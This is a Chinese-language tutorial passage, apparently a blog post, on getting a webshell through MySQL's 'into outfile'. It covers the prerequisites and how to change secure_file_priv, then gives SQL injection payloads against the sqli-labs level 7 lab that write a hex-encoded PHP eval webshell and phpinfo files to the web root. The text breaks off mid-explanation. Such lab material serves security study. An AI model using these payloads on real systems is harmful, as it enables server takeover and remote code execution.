mysql进行getshell方法

一. into outfile

利用条件
1. 此方法利用的先决条件

web目录具有写权限，能够使用单引号
知道网站绝对路径（根目录，或则是根目录往下的目录都行）
secure_file_priv没有具体值（在mysql/my.ini中查看）
2. secure_file_priv

secure_file_priv是用来限制load dumpfile、into outfile、load_file()函数在哪个目录下拥有上传和读取文件的权限。在mysql 5.6.34版本以后 secure_file_priv的值默认为NULL。如下关于secure_file_priv的配置介绍

secure_file_priv的值为null ，表示限制mysqld 不允许导入|导出
当secure_file_priv的值为/tmp/ ，表示限制mysqld 的导入|导出只能发生在/tmp/目录下
当secure_file_priv的值没有具体值时，表示不对mysqld 的导入|导出做限制
所以如果我们要想使用into outfile函数写入一句话的话就需要将secure_file_priv 的值设为没有值，那如何设置了？修改secure_file_priv 的值只能通过手动打开配置文件进行修改，不能直接使用sql语句进行修改

（1）看secure-file-priv参数的值

show global variables like '%secure%';

如下，secure_file_priv 的值默认为NULL，则表示限制mysqld 不允许导入|导出

（2）修改secure_file_priv 的值

我们可以在mysql/my.ini中查看是否有secure_file_priv 的参数，如果没有的话我们就添加 secure_file_priv = ' ' 即可

此时再查看secure_file_priv的值如下已经变为空了

 设置完成后我们就可以利用这个函数来写入一句话木马

写入webshell

我们以sqli-labs第七关为例

 我们已经通过一些方法获取到了网站的根目录，则可以写入一句话 “ <?php eval($_REQUEST[1]);?> ”。一句话建议进行十六进制转码（不用编码也可以） 16进制转换，16进制转换文本字符串，在线16进制转换 | 在线工具

编码后，然后在最前面加上 0x。如下我们将一句话木马进行十六进制编码后写入了根目录下的outfile.php文件中

?id=-3')) union select 1,0x3c3f706870206576616c28245f524551554553545b315d293b3f3e,3 into outfile 'C:\\Users\\Administrator.WIN2012\\Desktop\\phpStudy\\WWW\\outfile.php' --+

类似语句

?id=1 UNION ALL SELECT 1,'<?php phpinfo();?>',3 into outfile 'C:\info.php'%23
?id=1 UNION ALL SELECT 1,'<?php phpinfo();?>',3 into dumpfile 'C:\info.php'%23

成功写入，这里网站的目录要使用双斜杠不然会写不进去，第一个斜杠是转义的意思，字符串解析不仅仅局限于C编译器，Java编译器、一些配置文件的解析、Web服务器等等，都会遇到对字符串进行解析的这个问题，由于传统的 Windows采用的是单个斜杠的路径分隔形式，导致在对文件路径进行解析的时候可能发生不必要的错误，